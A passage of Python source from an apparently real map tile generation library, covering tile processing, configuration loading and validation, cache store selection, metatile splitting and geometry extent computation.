is None:\n return None\n\n if \"tiles\" in tile.metadata:\n tile.metadata[\"tiles\"][tile.tilecoord] = tile # type: ignore\n\n tilecoord = tile.tilecoord\n _LOGGER.debug(\"[%s] Metadata: %s\", tilecoord, tile.formated_metadata)\n for func in self.functions:\n try:\n _LOGGER.debug(\"[%s] Run: %s\", tilecoord, func)\n n = datetime.now()\n if self.safe:\n try:\n tile = func(tile)\n except Exception as e:\n _LOGGER.exception(\"[%s] Fail to process function %s\", tilecoord, func)\n tile.error = e\n else:\n tile = func(tile)\n _LOGGER.debug(\"[%s] %s in %s\", tilecoord, func.time_message if getattr(func, \"time_message\", None) is not None else func, str(datetime.now() - n)) # type: ignore\n if tile is None:\n _LOGGER.debug(\"[%s] Drop\", tilecoord)\n return None\n if tile.error:\n if tile.content_type and tile.content_type.startswith(\"application/vnd.ogc.se_xml\"):\n assert 
isinstance(tile.error, str)\n                        tile.error = f\"WMS server error: {self._re_rm_xml_tag.sub('', tile.error)}\"\n                    _LOGGER.warning(\"Error with tile %s:\\n%s\", tile.tilecoord, tile.error)\n                    _ERROR_COUNTER.labels(\n                        tile.metadata.get(\"layer\", \"none\"), tile.metadata.get(\"host\", \"none\")\n                    ).inc()\n\n                    if \"error_file\" in self.gene.get_main_config().config[\"generation\"]:\n                        self.gene.log_tiles_error(tile=tile, message=repr(tile.error))\n\n                    if self.max_consecutive_errors is not None:\n                        self.max_consecutive_errors(tile)\n\n                    if self.gene.queue_store is not None:\n                        self.gene.queue_store.delete_one(tile)\n                    with self.error_lock:\n                        self.error += 1\n                    return tile\n            except Exception:\n                _LOGGER.debug(\"Run error\", stack_info=True)\n                raise\n\n        if self.max_consecutive_errors is not None:\n            self.max_consecutive_errors(tile)\n\n        return tile\n\n\nclass Close:\n    \"\"\"Database closer.\"\"\"\n\n    def __init__(self, db: Any) -> None:\n        self.db = db\n\n    def __call__(self) -> None:\n        self.db.close()\n\n\nclass Legend(TypedDict, total=False):\n    \"\"\"Legend fields.\"\"\"\n\n    mime_type: str\n    href: str\n    max_resolution: float\n    min_resolution: float\n    width: int\n    height: int\n\n\nclass DatedConfig:\n    \"\"\"Loaded config with timestamps to be able to invalidate it on configuration file change.\"\"\"\n\n    def __init__(self, config: tilecloud_chain.configuration.Configuration, mtime: float, file: str) -> None:\n        self.config = config\n        self.mtime = mtime\n        self.file = file\n\n\nclass DatedGeoms:\n    \"\"\"Geoms with timestamps to be able to invalidate it on configuration change.\"\"\"\n\n    def __init__(self, geoms: Dict[Union[str, int], BaseGeometry], mtime: float) -> None:\n        self.geoms = geoms\n        self.mtime = mtime\n\n\nclass DatedTileGrid:\n    \"\"\"TileGrid with timestamps to be able to invalidate it on configuration change.\"\"\"\n\n    def __init__(self, grid: TileGrid, mtime: float) -> None:\n        self.grid = grid\n        self.mtime = mtime\n\n\nclass DatedHosts:\n    \"\"\"Hosts with timestamps to be able to invalidate it on configuration change.\"\"\"\n\n    def __init__(self, hosts: Dict[str, str], mtime: float) -> None:\n        self.hosts = hosts\n        self.mtime = mtime\n\n\nclass MissingErrorFileException(Exception):\n    \"\"\"Missing error file exception.\"\"\"\n\n\nclass LoggingInformation(TypedDict):\n    \"\"\"Logging information.\"\"\"\n\n    host: Optional[str]\n    layer: Optional[str]\n    meta_tilecoord: str\n\n\nLOGGING_CONTEXT: Dict[int, Dict[int, LoggingInformation]] = {}\n\n\nclass JsonLogHandler(c2cwsgiutils.pyramid_logging.JsonLogHandler):\n    \"\"\"Log to stdout in JSON.\"\"\"\n\n    def __init__(self, stream: Optional[TextIO] = None):\n        super().__init__(stream)\n        self.addFilter(TileFilter())\n\n\nclass TileFilter(logging.Filter):\n    \"\"\"A logging filter that adds request information to CEE logs.\"\"\"\n\n    def filter(self, record: Any) -> bool:\n        thread_id = threading.current_thread().native_id\n        assert thread_id is not None\n        log_info = LOGGING_CONTEXT.get(os.getpid(), {}).get(thread_id)\n\n        if log_info is not None:\n            record.tcc_host = log_info[\"host\"]\n            record.tcc_layer = log_info[\"layer\"]\n            record.tcc_meta_tilecoord = log_info[\"meta_tilecoord\"]\n\n        return True\n\n\nclass TileGeneration:\n    \"\"\"Base class of all the tile generation.\"\"\"\n\n    tilestream: Optional[Iterator[Tile]] = None\n    duration: timedelta = timedelta()\n    error = 0\n    queue_store: Optional[TileStore] = None\n    daemon = False\n\n    def __init__(\n        self,\n        config_file: Optional[str] = None,\n        options: Optional[Namespace] = None,\n        layer_name: Optional[str] = None,\n        
base_config: Optional[tilecloud_chain.configuration.Configuration] = None,\n configure_logging: bool = True,\n multi_thread: bool = True,\n maxconsecutive_errors: bool = True,\n ):\n self.geoms_cache: Dict[str, Dict[str, DatedGeoms]] = {}\n self._close_actions: List[\"Close\"] = []\n self.error_lock = threading.Lock()\n self.error_files_: Dict[str, TextIO] = {}\n self.functions_tiles: List[Callable[[Tile], Tile]] = []\n self.functions_metatiles: List[Callable[[Tile], Tile]] = []\n self.functions = self.functions_metatiles\n self.metatilesplitter_thread_pool: Optional[ThreadPoolExecutor] = None\n self.multi_thread = multi_thread\n self.maxconsecutive_errors = maxconsecutive_errors\n self.grid_cache: Dict[str, Dict[str, DatedTileGrid]] = {}\n self.layer_legends: Dict[str, List[Legend]] = {}\n self.config_file = config_file\n self.base_config = base_config\n self.configs: Dict[str, DatedConfig] = {}\n self.hosts_cache: Optional[DatedHosts] = None\n\n self.options: Namespace = options or collections.namedtuple( # type: ignore\n \"Options\",\n [\"verbose\", \"debug\", \"quiet\", \"bbox\", \"zoom\", \"test\", \"near\", \"time\", \"geom\", \"ignore_error\"],\n )(\n False, False, False, None, None, None, None, None, True, False # type: ignore\n )\n del options\n if not hasattr(self.options, \"bbox\"):\n self.options.bbox = None\n if not hasattr(self.options, \"zoom\"):\n self.options.zoom = None\n if not hasattr(self.options, \"test\"):\n self.options.test = None\n if not hasattr(self.options, \"near\"):\n self.options.near = None\n if not hasattr(self.options, \"time\"):\n self.options.time = None\n if not hasattr(self.options, \"geom\"):\n self.options.geom = True\n if not hasattr(self.options, \"ignore_error\"):\n self.options.ignore_error = False\n\n if configure_logging:\n if os.environ.get(\"CI\", \"false\").lower() != \"true\":\n ###\n # logging configuration\n # https://docs.python.org/3/library/logging.config.html#logging-config-dictschema\n ###\n logging.config.dictConfig(\n {\n \"version\": 1,\n \"root\": {\n \"level\": os.environ[\"OTHER_LOG_LEVEL\"],\n \"handlers\": [os.environ[\"LOG_TYPE\"]],\n },\n \"loggers\": {\n \"gunicorn.error\": {\"level\": os.environ[\"GUNICORN_LOG_LEVEL\"]},\n # \"level = INFO\" logs SQL queries.\n # \"level = DEBUG\" logs SQL queries and results.\n # \"level = WARN\" logs neither. 
(Recommended for production systems.)\n \"sqlalchemy.engine\": {\"level\": os.environ[\"SQL_LOG_LEVEL\"]},\n \"c2cwsgiutils\": {\"level\": os.environ[\"C2CWSGIUTILS_LOG_LEVEL\"]},\n \"tilecloud\": {\"level\": os.environ[\"TILECLOUD_LOG_LEVEL\"]},\n \"tilecloud_chain\": {\"level\": os.environ[\"TILECLOUD_CHAIN_LOG_LEVEL\"]},\n },\n \"handlers\": {\n \"console\": {\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"generic\",\n \"stream\": \"ext://sys.stdout\",\n },\n \"json\": {\n \"class\": \"c2cwsgiutils.pyramid_logging.JsonLogHandler\",\n \"formatter\": \"generic\",\n \"stream\": \"ext://sys.stdout\",\n },\n },\n \"formatters\": {\n \"generic\": {\n \"format\": \"%(asctime)s [%(process)d] [%(levelname)-5.5s] %(message)s\",\n \"datefmt\": \"[%Y-%m-%d %H:%M:%S %z]\",\n \"class\": \"logging.Formatter\",\n }\n },\n }\n )\n sentry.includeme()\n\n assert \"generation\" in self.get_main_config().config, self.get_main_config().config\n\n error = False\n if self.options is not None and self.options.zoom is not None:\n error_message = (\n f\"The zoom argument '{self.options.zoom}' has incorrect format, \"\n \"it can be a single value, a range (3-9), a list of values (2,5,7).\"\n )\n if self.options.zoom.find(\"-\") >= 0:\n splitted_zoom: List[str] = self.options.zoom.split(\"-\")\n if len(splitted_zoom) != 2:\n _LOGGER.error(error_message)\n error = True\n try:\n self.options.zoom = range(int(splitted_zoom[0]), int(splitted_zoom[1]) + 1)\n except ValueError:\n _LOGGER.exception(error_message)\n error = True\n elif self.options.zoom.find(\",\") >= 0:\n try:\n self.options.zoom = [int(z) for z in self.options.zoom.split(\",\")]\n except ValueError:\n _LOGGER.exception(error_message)\n error = True\n else:\n try:\n self.options.zoom = [int(self.options.zoom)]\n except ValueError:\n _LOGGER.exception(error_message)\n error = True\n\n if error:\n sys.exit(1)\n\n if layer_name and self.config_file:\n assert layer_name is not None\n self.create_log_tiles_error(layer_name)\n\n def get_host_config_file(self, host: Optional[str]) -> Optional[str]:\n \"\"\"Get the configuration file name for the given host.\"\"\"\n if self.config_file:\n return self.config_file\n assert host\n if host not in self.get_hosts():\n _LOGGER.error(\"Missing host '%s' in global config\", host)\n return None\n config_file = self.get_hosts().get(host, os.environ.get(\"TILEGENERATION_CONFIGFILE\"))\n _LOGGER.debug(\"For the host %s, use config file: %s\", host, config_file)\n return config_file\n\n def get_host_config(self, host: Optional[str]) -> DatedConfig:\n \"\"\"Get the configuration for the given host.\"\"\"\n config_file = self.get_host_config_file(host)\n if not config_file:\n _LOGGER.error(\"No config file for host %s\", host)\n return (\n self.get_config(config_file)\n if config_file\n else DatedConfig(cast(tilecloud_chain.configuration.Configuration, {}), 0, \"\")\n )\n\n def get_tile_config(self, tile: Tile) -> DatedConfig:\n return self.get_config(tile.metadata[\"config_file\"])\n\n def get_config(\n self,\n config_file: str,\n ignore_error: bool = True,\n base_config: Optional[tilecloud_chain.configuration.Configuration] = None,\n ) -> DatedConfig:\n \"\"\"Get the validated configuration for the file name, with cache management.\"\"\"\n assert config_file\n config_path = pathlib.Path(config_file)\n if not config_path.exists():\n _LOGGER.error(\"Missing config file %s\", config_file)\n if ignore_error:\n return DatedConfig(cast(tilecloud_chain.configuration.Configuration, {}), 0, \"\")\n else:\n sys.exit(1)\n\n 
config: Optional[DatedConfig] = self.configs.get(config_file)\n if config is not None and config.mtime == config_path.stat().st_mtime:\n return config\n\n config, success = self._get_config(config_file, ignore_error, base_config)\n if not success or config is None:\n if ignore_error:\n config = DatedConfig(cast(tilecloud_chain.configuration.Configuration, {}), 0, \"\")\n else:\n sys.exit(1)\n self.configs[config_file] = config\n return config\n\n def get_main_config(self) -> DatedConfig:\n if \"TILEGENERATION_MAIN_CONFIGFILE\" in os.environ and os.environ[\"TILEGENERATION_MAIN_CONFIGFILE\"]:\n return self.get_config(os.environ[\"TILEGENERATION_MAIN_CONFIGFILE\"], False)\n elif self.config_file:\n return self.get_config(self.config_file, self.options.ignore_error, self.base_config)\n else:\n _LOGGER.error(\"No provided configuration file\")\n return DatedConfig({}, 0, \"\")\n\n def get_hosts(self, silent: bool = False) -> Dict[str, str]:\n file_path = pathlib.Path(os.environ[\"TILEGENERATION_HOSTSFILE\"])\n if not file_path.exists():\n if not silent:\n _LOGGER.error(\"Missing hosts file %s\", file_path)\n return {}\n\n if self.hosts_cache is not None and self.hosts_cache.mtime == file_path.stat().st_mtime:\n return self.hosts_cache.hosts\n\n with file_path.open(encoding=\"utf-8\") as hosts_file:\n ruamel = YAML(typ=\"safe\")\n hosts = {}\n hosts_raw = ruamel.load(hosts_file)\n if \"sources\" in hosts_raw:\n for key, value in hosts_raw[\"sources\"].items():\n if isinstance(value, str):\n hosts[key] = value\n else:\n hosts.update(value)\n else:\n hosts = hosts_raw\n\n self.hosts_cache = DatedHosts(hosts, file_path.stat().st_mtime)\n return hosts\n\n def _get_config(\n self,\n config_file: str,\n ignore_error: bool,\n base_config: Optional[tilecloud_chain.configuration.Configuration] = None,\n ) -> Tuple[DatedConfig, bool]:\n \"\"\"Get the validated configuration for the file name.\"\"\"\n with open(config_file, encoding=\"utf-8\") as f:\n config: Dict[str, Any] = {}\n config.update({} if base_config is None else base_config)\n ruamel = YAML()\n config.update(ruamel.load(f))\n\n dated_config = DatedConfig(\n cast(tilecloud_chain.configuration.Configuration, config),\n pathlib.Path(config_file).stat().st_mtime,\n config_file,\n )\n success = self.validate_config(dated_config, ignore_error)\n return dated_config, success\n\n def validate_config(self, config: DatedConfig, ignore_error: bool) -> bool:\n \"\"\"Validate the configuration.\"\"\"\n # Generate base structure\n if \"defaults\" in config.config:\n del config.config[\"defaults\"]\n if \"generation\" not in config.config:\n config.config[\"generation\"] = {}\n if \"cost\" in config.config:\n if \"s3\" not in config.config[\"cost\"]:\n config.config[\"cost\"][\"s3\"] = {}\n if \"cloudfront\" not in config.config[\"cost\"]:\n config.config[\"cost\"][\"cloudfront\"] = {}\n if \"sqs\" not in config.config[\"cost\"]:\n config.config[\"cost\"][\"sqs\"] = {}\n\n schema_data = pkgutil.get_data(\"tilecloud_chain\", \"schema.json\")\n assert schema_data\n errors, _ = jsonschema_validator.validate(\n config.file, cast(Dict[str, Any], config.config), json.loads(schema_data), default=True\n )\n\n if errors:\n _LOGGER.error(\"The config file is invalid:\\n%s\", \"\\n\".join(errors))\n if not (\n ignore_error\n or os.environ.get(\"TILEGENERATION_IGNORE_CONFIG_ERROR\", \"FALSE\").lower() == \"true\"\n ):\n sys.exit(1)\n\n error = False\n grids = config.config.get(\"grids\", {})\n for grid in grids.values():\n if \"resolution_scale\" in grid:\n scale = 
grid[\"resolution_scale\"]\n for resolution in grid[\"resolutions\"]:\n if resolution * scale % 1 != 0.0:\n _LOGGER.error(\n \"The resolution %s * resolution_scale %s is not an integer.\", resolution, scale\n )\n error = True\n else:\n grid[\"resolution_scale\"] = self._resolution_scale(grid[\"resolutions\"])\n\n srs = int(grid[\"srs\"].split(\":\")[1])\n if \"proj4_literal\" not in grid:\n if srs == 3857:\n grid[\"proj4_literal\"] = (\n \"+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 \"\n \"+x_0=0.0 +y_0=0.0 +k=1.0 +units=m +nadgrids=@null +wktext +no_defs +over\"\n )\n elif srs == 21781:\n grid[\"proj4_literal\"] = (\n \"+proj=somerc +lat_0=46.95240555555556 +lon_0=7.439583333333333 +k_0=1 \"\n \"+x_0=600000 +y_0=200000 +ellps=bessel +towgs84=674.374,15.056,405.346,0,0,0,0 \"\n \"+units=m +no_defs\"\n )\n elif srs == 2056:\n grid[\"proj4_literal\"] = (\n \"+proj=somerc +lat_0=46.95240555555556 +lon_0=7.439583333333333 +k_0=1 \"\n \"+x_0=2600000 +y_0=1200000 +ellps=bessel +towgs84=674.374,15.056,405.346,0,0,0,0 \"\n \"+units=m +no_defs\"\n )\n else:\n grid[\"proj4_literal\"] = f\"+init={grid['srs']}\"\n\n layers = config.config.get(\"layers\", {})\n for lname, layer in sorted(layers.items()):\n if \"headers\" not in layer and layer[\"type\"] == \"wms\":\n layer[\"headers\"] = {\n \"Cache-Control\": \"no-cache, no-store\",\n \"Pragma\": \"no-cache\",\n }\n if layer[\"type\"] == \"mapnik\" and layer.get(\"output_format\", \"png\") == \"grid\" and layer[\"meta\"]:\n _LOGGER.error(\"The layer '%s' is of type Mapnik/Grid, that can't support matatiles.\", lname)\n error = True\n\n if error:\n if not (\n ignore_error\n or os.environ.get(\"TILEGENERATION_IGNORE_CONFIG_ERROR\", \"FALSE\").lower() == \"true\"\n ):\n sys.exit(1)\n\n return not (error or errors)\n\n def init(self, queue_store: Optional[TileStore] = None, daemon: bool = False) -> None:\n self.queue_store = queue_store\n self.daemon = daemon\n\n @staticmethod\n def _primefactors(x: int) -> List[int]:\n factorlist = []\n loop = 2\n while loop <= x:\n if x % loop == 0:\n x = round(x / loop)\n factorlist.append(loop)\n else:\n loop += 1\n return factorlist\n\n def _resolution_scale(self, resolutions: Union[List[float], List[int]]) -> int:\n prime_fact = {}\n for resolution in resolutions:\n denominator = Fraction(str(resolution)).denominator\n prime_factors = self._primefactors(denominator)\n for factor in set(prime_factors):\n if factor not in prime_fact:\n prime_fact[factor] = 0\n\n prime_fact[factor] = max(prime_fact[factor], len([f for f in prime_factors if f == factor]))\n\n result = 1\n for fact, nb in prime_fact.items():\n result *= fact**nb\n return result\n\n def get_all_dimensions(self, layer: tilecloud_chain.configuration.Layer) -> List[Dict[str, str]]:\n assert layer is not None\n\n options_dimensions = {}\n for opt_dim in self.options.dimensions:\n opt_dim = opt_dim.split(\"=\")\n if len(opt_dim) != 2:\n sys.exit(\"the DIMENSIONS option should be like this DATE=2013 VERSION=13.\")\n options_dimensions[opt_dim[0]] = opt_dim[1]\n\n all_dimensions = [\n [(dim[\"name\"], d) for d in dim[\"generate\"]]\n for dim in layer.get(\"dimensions\", [])\n if dim[\"name\"] not in options_dimensions\n ]\n all_dimensions += [[p] for p in options_dimensions.items()]\n return [{}] if len(all_dimensions) == 0 else [dict(d) for d in product(*all_dimensions)]\n\n def get_store(\n self,\n config: DatedConfig,\n cache: tilecloud_chain.configuration.Cache,\n layer_name: str,\n read_only: bool = False,\n ) -> TileStore:\n layer = 
config.config[\"layers\"][layer_name]\n grid = config.config[\"grids\"][layer[\"grid\"]]\n layout = WMTSTileLayout(\n layer=layer_name,\n url=cache[\"folder\"],\n style=layer[\"wmts_style\"],\n format=\".\" + layer[\"extension\"],\n dimensions_name=[dimension[\"name\"] for dimension in layer.get(\"dimensions\", [])],\n tile_matrix_set=layer[\"grid\"],\n tile_matrix=lambda z: get_tile_matrix_identifier(grid, zoom=z),\n request_encoding=\"REST\",\n )\n # store\n if cache[\"type\"] == \"s3\":\n cache_s3 = cast(tilecloud_chain.configuration.CacheS3, cache)\n # on s3\n cache_tilestore: TileStore = S3TileStore(\n cache_s3[\"bucket\"],\n layout,\n s3_host=cache.get(\"host\", \"s3-eu-west-1.amazonaws.com\"),\n cache_control=cache.get(\"cache_control\"),\n )\n elif cache[\"type\"] == \"azure\":\n cache_azure = cast(tilecloud_chain.configuration.CacheAzureTyped, cache)\n # on Azure\n cache_tilestore = AzureStorageBlobTileStore(\n container=cache_azure[\"container\"],\n tilelayout=layout,\n cache_control=cache_azure.get(\"cache_control\"),\n )\n elif cache[\"type\"] == \"mbtiles\":\n metadata = {}\n for dimension in layer[\"dimensions\"]:\n metadata[\"dimension_\" + dimension[\"name\"]] = dimension[\"default\"]\n # on mbtiles file\n filename = (\n layout.filename(TileCoord(0, 0, 0), metadata=metadata).replace(\"/0/0/0\", \"\") + \".mbtiles\"\n )\n if not os.path.exists(os.path.dirname(filename)):\n os.makedirs(os.path.dirname(filename))\n cache_tilestore = MBTilesTileStore(\n sqlite3.connect(filename),\n content_type=layer[\"mime_type\"],\n tilecoord_in_topleft=True,\n )\n elif cache[\"type\"] == \"bsddb\":\n metadata = {}\n for dimension in layer[\"dimensions\"]:\n metadata[\"dimension_\" + dimension[\"name\"]] = dimension[\"default\"]\n import bsddb3 as bsddb # pylint: disable=import-outside-toplevel,import-error\n\n from tilecloud.store.bsddb import BSDDBTileStore # pylint: disable=import-outside-toplevel\n\n # on bsddb file\n filename = layout.filename(TileCoord(0, 0, 0), metadata=metadata).replace(\"/0/0/0\", \"\") + \".bsddb\"\n if not os.path.exists(os.path.dirname(filename)):\n os.makedirs(os.path.dirname(filename))\n db = bsddb.hashopen(\n filename,\n # and os.path.exists(filename) to avoid error on non existing file\n \"r\" if read_only and os.path.exists(filename) else \"c\",\n )\n\n self._close_actions.append(Close(db))\n\n cache_tilestore = BSDDBTileStore(\n db,\n content_type=layer[\"mime_type\"],\n )\n elif cache[\"type\"] == \"filesystem\":\n # on filesystem\n cache_tilestore = FilesystemTileStore(\n layout,\n content_type=layer[\"mime_type\"],\n )\n else:\n sys.exit(\"unknown cache type: \" + cache[\"type\"])\n\n return cache_tilestore\n\n @staticmethod\n def get_grid_name(\n config: DatedConfig, layer: tilecloud_chain.configuration.Layer, name: Optional[Any] = None\n ) -> tilecloud_chain.configuration.Grid:\n if name is None:\n name = layer[\"grid\"]\n\n return config.config[\"grids\"][name]\n\n def get_tilesstore(self, cache: Optional[str] = None) -> TimedTileStoreWrapper:\n gene = self\n\n def get_store(config_file: str, layer_name: str) -> TileStore:\n config = gene.get_config(config_file)\n cache_name = cache or config.config[\"generation\"][\"default_cache\"]\n cache_obj = config.config[\"caches\"][cache_name]\n return self.get_store(config, cache_obj, layer_name)\n\n cache_tilestore = TimedTileStoreWrapper(\n MultiTileStore(get_store),\n store_name=\"store\",\n )\n return cache_tilestore\n\n def add_geom_filter(self) -> None:\n self.imap(IntersectGeometryFilter(gene=self), 
\"Intersect with geom\")\n\n def add_logger(self) -> None:\n if (\n not self.options.quiet\n and not self.options.verbose\n and not self.options.debug\n and os.environ.get(\"FRONTEND\") != \"noninteractive\"\n ):\n\n def log_tiles(tile: Tile) -> Tile:\n sys.stdout.write(f\"{tile.tilecoord} {tile.formated_metadata} \\r\")\n sys.stdout.flush()\n return tile\n\n self.imap(log_tiles)\n elif not self.options.quiet and getattr(self.options, \"role\", None) != \"server\":\n self.imap(Logger(_LOGGER, logging.INFO, \"%(tilecoord)s, %(formated_metadata)s\"))\n\n def add_metatile_splitter(self, store: Optional[TileStore] = None) -> None:\n assert self.functions != self.functions_tiles, \"add_metatile_splitter should not be called twice\"\n if store is None:\n gene = self\n\n def get_splitter(config_file: str, layer_name: str) -> Optional[MetaTileSplitterTileStore]:\n config = gene.get_config(config_file)\n layer = config.config[\"layers\"][layer_name]\n if layer.get(\"meta\"):\n return MetaTileSplitterTileStore(\n layer[\"mime_type\"],\n config.config[\"grids\"][layer[\"grid\"]][\"tile_size\"],\n layer[\"meta_buffer\"],\n )\n return None\n\n store = TimedTileStoreWrapper(MultiTileStore(get_splitter), store_name=\"splitter\")\n\n run = Run(self, self.functions_tiles)\n nb_thread = int(os.environ.get(\"TILE_NB_THREAD\", \"1\"))\n if nb_thread == 1 or not self.multi_thread:\n\n def meta_get(metatile: Tile) -> Tile:\n assert store is not None\n substream = store.get((metatile,))\n\n if getattr(self.options, \"role\", \"\") == \"hash\":\n tile = next(substream)\n assert tile is not None\n run(tile)\n else:\n for tile in substream:\n assert tile is not None\n tile.metadata.update(metatile.metadata)\n run(tile)\n with self.error_lock:\n self.error += run.error\n return metatile\n\n else:\n\n def meta_get(metatile: Tile) -> Tile:\n assert store is not None\n if self.metatilesplitter_thread_pool is None:\n self.metatilesplitter_thread_pool = ThreadPoolExecutor(nb_thread)\n\n substream = store.get((metatile,))\n\n for _ in self.metatilesplitter_thread_pool.map(\n run, substream, chunksize=int(os.environ.get(\"TILE_CHUNK_SIZE\", \"1\"))\n ):\n pass\n\n with self.error_lock:\n self.error += run.error\n return metatile\n\n self.imap(meta_get)\n self.functions = self.functions_tiles\n\n def create_log_tiles_error(self, layer: str) -> Optional[TextIO]:\n if \"error_file\" in self.get_main_config().config.get(\"generation\", {}):\n now = datetime.now()\n time_ = now.strftime(\"%d-%m-%Y %H:%M:%S\")\n error_file = open( # pylint: disable=consider-using-with\n self.get_main_config().config[\"generation\"][\"error_file\"].format(layer=layer, datetime=now),\n \"a\",\n encoding=\"utf-8\",\n )\n error_file.write(f\"# [{time_}] Start the layer '{layer}' generation\\n\")\n self.error_files_[layer] = error_file\n return error_file\n return None\n\n def close(self) -> None:\n for file_ in self.error_files_.values():\n file_.close()\n\n def get_log_tiles_error_file(self, layer: str) -> Optional[TextIO]:\n return self.error_files_[layer] if layer in self.error_files_ else self.create_log_tiles_error(layer)\n\n def log_tiles_error(self, tile: Optional[Tile] = None, message: Optional[str] = None) -> None:\n if tile is None:\n return\n config = self.get_tile_config(tile)\n if \"error_file\" in config.config[\"generation\"]:\n assert tile is not None\n\n time_ = datetime.now().strftime(\"%d-%m-%Y %H:%M:%S\")\n if self.get_log_tiles_error_file(tile.metadata[\"layer\"]) is None:\n raise MissingErrorFileException(\"Missing error 
file\")\n\n tilecoord = \"\" if tile.tilecoord is None else f\"{tile.tilecoord} {tile.formated_metadata} \"\n message = \"\" if message is None else f\" {message}\"\n\n io = self.get_log_tiles_error_file(tile.metadata[\"layer\"])\n assert io is not None\n out_message = message.replace(\"\\n\", \" \")\n io.write(f\"{tilecoord}# [{time_}]{out_message}\\n\")\n\n def get_grid(self, config: DatedConfig, grid_name: str) -> TileGrid:\n dated_grid = self.grid_cache.get(config.file, {}).get(grid_name)\n if dated_grid is not None and config.mtime == dated_grid.mtime:\n return dated_grid.grid\n\n grid = config.config[\"grids\"][grid_name]\n scale = grid[\"resolution_scale\"]\n\n tilegrid = FreeTileGrid(\n resolutions=cast(List[int], [r * scale for r in grid[\"resolutions\"]]),\n scale=scale,\n max_extent=cast(Tuple[int, int, int, int], grid[\"bbox\"]),\n tile_size=grid[\"tile_size\"],\n )\n\n self.grid_cache.setdefault(config.file, {})[grid_name] = DatedTileGrid(tilegrid, config.mtime)\n return tilegrid\n\n def get_geoms(\n self, config: DatedConfig, layer_name: str, host: Optional[str] = None\n ) -> Dict[Union[str, int], BaseGeometry]:\n dated_geoms = self.geoms_cache.get(config.file, {}).get(layer_name)\n if dated_geoms is not None and config.mtime == dated_geoms.mtime:\n return dated_geoms.geoms\n\n layer = config.config[\"layers\"][layer_name]\n\n if self.options.near is not None or (\n self.options.time is not None and \"bbox\" in layer and self.options.zoom is not None\n ):\n if self.options.zoom is None or len(self.options.zoom) != 1:\n sys.exit(\"Option --near needs the option --zoom with one value.\")\n if not (self.options.time is not None or self.options.test is not None):\n sys.exit(\"Option --near needs the option --time or --test.\")\n position = (\n self.options.near\n if self.options.near is not None\n else [(layer[\"bbox\"][0] + layer[\"bbox\"][2]) / 2, (layer[\"bbox\"][1] + layer[\"bbox\"][3]) / 2]\n )\n bbox = config.config[\"grids\"][layer[\"grid\"]][\"bbox\"]\n diff = [position[0] - bbox[0], position[1] - bbox[1]]\n resolution = config.config[\"grids\"][layer[\"grid\"]][\"resolutions\"][self.options.zoom[0]]\n mt_to_m = layer[\"meta_size\"] * config.config[\"grids\"][layer[\"grid\"]][\"tile_size\"] * resolution\n mt = [float(d) / mt_to_m for d in diff]\n\n nb_tile = self.options.time * 3 if self.options.time is not None else self.options.test\n nb_mt = nb_tile / (layer[\"meta_size\"] ** 2)\n nb_sqrt_mt = ceil(sqrt(nb_mt))\n\n mt_origin = [round(m - nb_sqrt_mt / 2) for m in mt]\n extent = [\n bbox[0] + mt_origin[0] * mt_to_m,\n bbox[1] + mt_origin[1] * mt_to_m,\n bbox[0] + (mt_origin[0] + nb_sqrt_mt) * mt_to_m,\n bbox[1] + (mt_origin[1] + nb_sqrt_mt) * mt_to_m,\n ]\n elif self.options.bbox is not None:\n extent = self.options.bbox\n elif \"bbox\" in layer:\n extent = layer[\"bbox\"]\n else:\n extent = config.config[\"grids\"][layer[\"grid\"]][\"bbox\"]\n\n geoms: Dict[Union[str, int], BaseGeometry] = {}\n if extent:\n geom = Polygon(\n (\n (extent[0], extent[1]),\n (extent[0], extent[3]),\n (extent[2], extent[3]),\n (extent[2], extent[1]),\n )\n )\n for z, r in enumerate(config.config[\"grids\"][layer[\"grid\"]][\"resolutions\"]):\n geoms[z] = geom\n\n if self.options.near is None and self.options.geom:\n for g in layer.get(\"geoms\", []):\n with _GEOMS_GET_SUMMARY.labels(layer_name, host if host else self.options.host).time():\n connection = psycopg2.connect(g[\"connection\"])\n cursor = connection.cursor()\n sql = f\"SELECT ST_AsBinary(geom) FROM (SELECT {g['sql']}) AS g\" # 
nosec\n                    _LOGGER.info(\"Execute SQL: %s.\", sql)\n                    cursor.execute(sql)\n                    geom_list = [loads_wkb(bytes(r[0])) for r in cursor.fetchall()]\n                    geom = unary_union(geom_list)\n                    if extent:\n                        geom = geom.intersection(\n                            Polygon(\n                                (\n                                    (extent[0], extent[1]),\n                                    (extent[0], extent[3]),\n                                    (extent[2], extent[3]),\n                                    (extent[2], extent[1]),\n                                )\n                            )\n                        )\n                    for z, r in enumerate(config.config[\"grids\"][layer[\"grid\"]][\"resolutions\"]):\n                        if (\"min_resolution\" not in g or g[\"min_resolution\"] <= r) and (\n                            \"max_resolution\" not in g or g[\"max_resolution\"] >= r\n                        ):\n                            geoms[z] = geom\n                    cursor.close()\n                    connection.close()\n\n        self.geoms_cache.setdefault(config.file, {})[layer_name] = DatedGeoms(geoms, config.mtime)\n        return geoms\n\n    def init_tilecoords(self, config: DatedConfig, layer_name: str) -> None:\n        layer = config.config[\"layers\"][layer_name]\n        resolutions = config.config[\"grids\"][layer[\"grid\"]][\"resolutions\"]\n\n        if self.options.time is not None and self.options.zoom is None:\n            if \"min_resolution_seed\" in layer:\n                self.options.zoom = [resolutions.index(layer[\"min_resolution_seed\"])]\n            else:\n                self.options.zoom = [len(resolutions) - 1]\n\n        if self.options.zoom is not None:\n            zoom_max = len(resolutions) - 1\n            for zoom in self.options.zoom:\n                if zoom > zoom_max:\n                    _LOGGER.warning(\n                        \"zoom %i is greater than the maximum zoom %i of grid %s of layer %s, ignored.\",\n                        zoom,\n                        zoom_max,\n                        layer[\"grid\"],\n                        layer_name,\n                    )\n            self.options.zoom = [z for z in self.options.zoom if z <= zoom_max]\n\n        if \"min_resolution_seed\" in layer:\n            if self.options.zoom is None:\n                self.options.zoom = []\n                for z, resolution in enumerate(resolutions):\n                    if resolution >= layer[\"min_resolution_seed\"]:\n                        self.options.zoom.append(z)\n            else:\n                for zoom in self.options.zoom:\n                    resolution = resolutions[zoom]\n                    if resolution < layer[\"min_resolution_seed\"]:\n                        _LOGGER.warning(\n                            \"zoom %i corresponds to resolution %s, which is smaller\"\n                            \" than the 'min_resolution_seed' %s of layer %s, ignored.\",\n                            zoom,\n                            resolution,\n                            layer[\"min_resolution_seed\"],\n                            layer_name,\n                        )\n                self.options.zoom = [\n                    z for z in self.options.zoom if resolutions[z] >= layer[\"min_resolution_seed\"]\n                